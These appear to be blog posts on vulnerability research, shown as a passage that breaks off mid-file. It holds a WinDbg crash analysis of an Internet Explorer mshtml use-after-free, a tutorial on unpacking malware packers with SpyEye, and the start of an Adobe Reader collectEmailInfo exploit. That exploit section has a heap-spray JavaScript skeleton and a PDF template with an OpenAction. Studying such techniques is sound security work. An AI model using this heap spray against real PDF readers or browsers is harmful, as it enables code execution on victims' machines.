<p>Restart windbg and set a breakpoint:</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 511px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 42px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">bp mshtml!CEventObj::GenericGetElement+0x97</pre></pre><br /><p>Then press g. When Internet Explorer comes up, open the html page.</p><br /><p>We break at that point and view the contents of the address pointed to by esi.</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 500px; padding-top: 5px; border-bottom: #cecece 1px solid; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0:000> dds poi(esi) l1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">036f7b30 7d4c1850 mshtml!CImgElement::`vftable'<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0:000> dds ecx l1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">036f7b30 7d4c1850 mshtml!CImgElement::`vftable'</pre></pre><br /><p>We see that ecx points to the CImgElement vtable.</p><br /><p>Looking at the vtable:</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; 
border-left: #cecece 1px solid; width: 500px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 111px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0:000> dds 7d4c1850 l10<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1850 7d6de377 mshtml!CImgElement::PrivateQueryInterface<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c1854 7d4f43c9 mshtml!CElement::PrivateAddRef<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1858 7d4f4cdd mshtml!CElement::PrivateRelease<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c185c 7d519a0e mshtml!C1DElement::`vector deleting destructor<span style="color: #008000">'</span><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1860 7d56c685 mshtml!CImgElement::Init<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c1864 7d56c5e0 mshtml!CImgElement::Passivate<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1868 7d63ba1f mshtml!CBase::GetEnabled<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c186c 7d63ba1f mshtml!CBase::GetEnabled<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; 
font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1870 7d63b1f2 mshtml!CBase::GetPages<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c1874 7d63b644 mshtml!CBase::InterfaceSupportsErrorInfo<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1878 7d6df0f8 mshtml!CImgElement::QueryStatus<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c187c 7d6dff5f mshtml!CImgElement::Exec<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1880 7d4fad5c mshtml!CRect::CRect<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c1884 7d4f4e9d mshtml!CElement::SecurityContext<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1888 7d4f7c1c mshtml!CBase::SecurityContextAllowsAccess<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c188c 7d5e71d8 mshtml!CElement::DesignMode</pre></pre><br /><p>We can use the following windbg command to automate this and see which objects are created at the address pointed to by esi each time the breakpoint is hit:</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 500px; padding-top: 5px; border-bottom: #cecece 1px solid; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; 
font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">bp mshtml!CEventObj::GenericGetElement+0x93 "<span style="color: #8b0000">.printf \"esi = [%08x] \",esi;dds poi(esi) l1;gc</span>"</pre></pre><br /><p>I press g in windbg and see the following</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 502px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 119px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 94.9%; font-family: consolas,'Courier New',courier,monospace; height: 11px; background-color: #fbfbfb">esi = [036f7f20] 036f7b30 7d4c1850 mshtml!CImgElement::`vftable<span style="color: #008000">'</span><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">esi = [036f7f20] 036f7b30 7d4c1850 mshtml!CImgElement::`vftable<span style="color: #008000">'</span><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">ModLoad: 75c50000 75cbe000 C:\WINDOWS\system32\jscript.dll<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">esi = [036f6b60] aaaaaaaa ????????<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">(8b8.768): Access violation - code c0000005 (first chance)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">First chance exceptions are reported before any exception handling.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier 
New',courier,monospace; background-color: #fbfbfb">This exception may be expected <span style="color: #0000ff">and</span> handled.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">eax=036f7bc0 ebx=aaaaaaaa ecx=aaaaaaaa edx=03703cd0 esi=036f6b60 edi=ffffffff<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">eip=7d4f2531 esp=0013e154 ebp=0013e174 iopl=0 nv up ei pl nz na pe nc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">mshtml!CElement::GetDocPtr:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4f2531 8b01 mov eax,dword ptr [ecx] ds:0023:aaaaaaaa=????????<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre></pre><br /><p>We see that esi always points to the place where the CImgElement was created; on the last hit that memory no longer holds a valid object.</p><p>Restart windbg and clear all the old breakpoints using bc *.</p><p>Let us find out which functions cause the exception. I set another breakpoint:</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 500px; padding-top: 5px; border-bottom: #cecece 1px solid; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: 
bp">
#fbfbfb">bp mshtml!CEventObj::GenericGetElement+0x97</pre></pre><br /><p>and run windbg. Windbg breaks at the following location:</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 500px; padding-top: 5px; border-bottom: #cecece 1px solid; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Breakpoint 0 hit<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">eax=0013e4c8 ebx=036f7b30 ecx=036f7b30 edx=0013dfc0 esi=036f7f20 edi=ffffffff<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">eip=7d6d5250 esp=0013df7c ebp=0013df98 iopl=0 nv up ei pl nz na po nc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">mshtml!CEventObj::GenericGetElement+0x97:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d6d5250 e8dcd2e1ff <span style="color: #0000ff">call</span> mshtml!CElement::GetDocPtr (7d4f2531)</pre></pre><br /><p>Let's set a breakpoint at the address pointed to by ecx and see which functions write to the address ecx=036f7b30.</p><p>After the breakpoint is hit I clear all the breakpoints and set a breakpoint on write at ecx=036f7b30:</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: 
#cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 503px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 143px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0:000> bc *<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0:000> ba w4 036f7b30 "<span style="color: #8b0000">.printf \"eip=[%08x] \n\n \",eip;u eip l1;gc</span>"<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0:000> g<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">eip=[7d519a43] mshtml!CElement::~CElement+0x10:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d519a43 7406 je mshtml!CElement::~CElement+0x18 (7d519a4b)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">ModLoad: 75c50000 75cbe000 C:\WINDOWS\system32\jscript.dll<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">eip=[7d4f2c22] mshtml!<span style="color: #0000ff">CStr</span>::<span style="color: #0000ff">Set</span>+0x3e:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4f2c22 83c004 <span style="color: #0000ff">add</span> eax,4<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; 
(464">
background-color: #fbfbfb">(464.960): Access violation - code c0000005 (first chance)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">First chance exceptions are reported before any exception handling.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">This exception may be expected <span style="color: #0000ff">and</span> handled.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">eax=036f8a50 ebx=aaaaaaaa ecx=aaaaaaaa edx=03703df0 esi=036f7fc0 edi=ffffffff<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">eip=7d4f2531 esp=0013e154 ebp=0013e174 iopl=0 nv up ei pl nz na pe nc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">mshtml!CElement::GetDocPtr:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4f2531 8b01 mov eax,dword ptr [ecx] ds:0023:aaaaaaaa=????????<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre></pre><br /><p>It looks like some of the functions which write to the address are:</p><br /><p>mshtml!CElement::~CElement<br />mshtml!CStr::Set</p><br /><h3><font color="#008000">To be continued. . 
.</font></h3> abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com0tag:blogger.com,1999:blog-9205939188428310956.post-83714739331218942142011-10-11T22:33:00.001-07:002011-10-31T22:00:37.709-07:00Unpacking Custom Packers<p> </p> <p>There are several articles on the internet about unpacking packed executables. Most demonstrate the ESP trick. This trick may not work for most packers. These days most malware uses custom packers which are created using some toolkit. You can find a lot of malware of this type, like Zbot, SpyEye, Cycbot.</p> <h4><font color="#0000ff">How PE Packers work</font></h4> <p>PE packers compress the PE sections or some other data using compression algorithms like LZMA, LZSS, aPLib etc. So before running the actual malicious code the packer would:</p> <p><strong>1)Decompress the compressed code:</strong></p> <p>To do this it usually allocates some space using VirtualAlloc() or ZwAllocateVirtualMemory(). Then it decompresses the data into the allocated memory.</p> <p><strong>2)Fix the imports:</strong></p> <p>The imports are fixed so the malware can use the imported APIs. To resolve the import addresses it uses the GetProcAddress() API.</p> <p><strong>3)Jump to the OEP:</strong></p> <p>Finally it jumps to the OEP where the actual malware code begins. Many malware samples use multilevel packers.</p> <h4><font color="#0000ff">How to Unpack:</font></h4> <p>We can set a breakpoint on VirtualAlloc() first; after that breakpoint is hit we remove the breakpoint on VirtualAlloc() and set a breakpoint on GetProcAddress().</p> <p>We see that GetProcAddress() is called repeatedly in a loop. This loop is used to resolve all the APIs in the dll. 
We bypass the loop and after that continue debugging.</p> <p>After a few more lines of code we will reach the OEP.</p> <h4><font color="#0000ff">DEMO:</font></h4> <p>I have taken a sample of SpyEye for the demo.</p> <p>I set a breakpoint on VirtualAlloc():</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT7O0xAlbS5KVKghQDv1WQ8p1M6ckCKjS4GKXVMdTpsQDPwO_rQqpQMqjUPXEHIZ2nTosHBTOvsp1Fd0bpHQTFfFubZuzLGNbDsE8QBz_RqaW7Q_5AoiddUQCMwufMVrKN8H-b5SfvbT9O/s1600-h/image%25255B7%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="151" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGi2o9Q_oe1u65XqFacAXbPqmelq2lN8TB6Nj_ZNozHk__mzTrY77GuBfYQOASC32rbW1V7aCuh8mWWCNV1cN2wTPYFSXFTGg-UT1lqEP7M1tstyMNn9NgFuHfK2m6Z-cmB1Z98fYireWv//?imgmax=800" width="617" border="0"></a> </p> <p>Then I set a breakpoint on GetProcAddress() and break at the following:</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7jqWcNEtI9cjeXAAPJHpDaxKyvF6X9LUZDOjX-_KTUsArAck7OehfH7G_2c9Reaa5f67FY4zQqUyeb3PAklNjuAcwyk5j_AswzZI6zkaTwUs-FoJeZ2DItIdyfKc5EJ0vBH_qNwn7ec3g/s1600-h/image%25255B20%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="268" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCBgZsDsaIvK_pY8XjKppHSh5MnDkbVd_JwoGoA0AS_gV0bAWwUTnXWvK36MmXgOuuAGir5dSSiqURrc7Y_5smUiOqH9PtVyxvTlG5z4yxO88uvmEd3a-UKdTyydI376qgtyWcG32FeyZU//?imgmax=800" width="632" border="0"></a> </p> <p> </p> <p>We see that GetProcAddress() is called in a loop. 
We bypass the loop, and a little below you can see a jump that looks like the jump to the OEP.</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGeuVB1dQ2-S-JQOO5fA-iCzThAfaLb3uwIfx1sSQgjbQzmN-Pyr1HT5TMJUKkEBnX1vgAsi2dPYC7kvsOMiBPZEL7UoI5y_tszL0QouHR6GpULMxJPhH6IBugNS29vWPxy33nfuspsOLT/s1600-h/image%25255B26%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="321" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzjhNorvrGoxg5A_deF58y8zqle_42gDNFDZbNbpdVDQIJbrtcx5EoHRcZaiTGbjGWIxSvdwM0MVg3qZuyDwYxNKKqSoNG6xJKcq1I0k9S_4koPPw6-dd1f1xPwcC4h_JyUokF9WM8QhwL//?imgmax=800" width="650" border="0"></a> </p> <p>I follow the jump:</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWuE2zsQlEVucVSPhzFiKBRzfW2q0bnNDyi4UCHRRKCrqQN-dhoGleUly-SGvK_pndvb_Xwn0Gij9ikzLQq3EcKrHPz8EuZWeAVuM3MXa2cbtxLYV2-004RxfUfZuV7x02G1HjsNvg8sik/s1600-h/image%25255B30%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="175" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNiP-vYUCxEuZKTrSNQfRSzGziQqonPZTO4Pds4Hd3k9nBR4WSdV2PaEwOvo4j-g1LaU-wSZmReXknfaaX6GkON-e6bhBnzGnqCJXqzV4vJ0puOhRWjnTuZORRP2zUU4C8w2A1asUPwXO0Avw//?imgmax=800" width="662" border="0"></a> </p> <p> </p> <p>This is another layer of the packer.</p> <p>The trick applies to most packers. It may not work when packers are combined with protectors like ASProtect. 
</p> <p> Feel free to comment.</p> abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com4tag:blogger.com,1999:blog-9205939188428310956.post-65153847126603764152011-07-15T08:45:00.001-07:002011-07-16T04:46:49.075-07:00Heap Spraying Adobe: exploiting collab.collectemailinfo()<p> </p> <p><strong><font color="#008080" size="3">Heap Spray Concept</font></strong>: </p> <p>First of all I would like readers to know that a heap spray is not a vulnerability like a heap overflow; it is a technique used to exploit vulnerabilities. It is basically used to exploit browsers and PDF readers, where embedded languages like javascript come into play.</p> <p>The reason is that javascript variables are created on the heap rather than as stack variables.</p> <p>Generally we create a large number of javascript variables, say using arrays:</p><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">array = new Array();<br />nops = "%u9090%u9090………….%u9090";<br />shellcode = "%u6565%u………………";<br />array[1] = nops + shellcode;<br />array[2] = nops + shellcode;<br />...<br />array[300] = nops + shellcode;</pre> <p>This fills the heap area with a combination of nops and shellcode. Usually the heap resides in a higher memory area like 0x0a0a0a0a …0x0c0c0c0c. We try to fill these addresses with the combination of nops and shellcode, and later we redirect the flow to these addresses so that our shellcode gets executed.</p> <p>Enough of theory, let's move on to the practical implementation.</p> <p>I have tried the exploit with Adobe 8.1.1 and older. A stack overflow bug exists in Collab.collectEmailInfo() in Adobe. 
Exploitation involves spraying the heap and then overwriting EIP with the heap address 0x0a0a0a0a.</p> <p><strong><font color="#008080" size="3">Let's start:</font></strong></p> <p><font color="#000000" size="2">I created a PDF template using <em>Didier Stevens</em>' tools:</font></p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 498px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 208px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">%PDF-1.1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">1 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Catalog<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Outlines 2 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Pages 3 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /OpenAction 7 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">>><br 
/></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">2 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Type /Outlines<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Count 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">3 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Pages<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Kids 
[4 0 R]<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Count 1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">4 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Page<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Parent 3 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /MediaBox [0 0 612 792]<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Contents 5 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Resources <<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /ProcSet [/PDF /Text]<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: 
consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Font << /F1 6 0 R >><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> >><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">5 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><< /Length 56 >><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">stream<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">endstream<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">6 0 obj<br 
/></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Font<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Subtype /Type1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Name /F1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /BaseFont /Helvetica<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Encoding /MacRomanEncoding<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 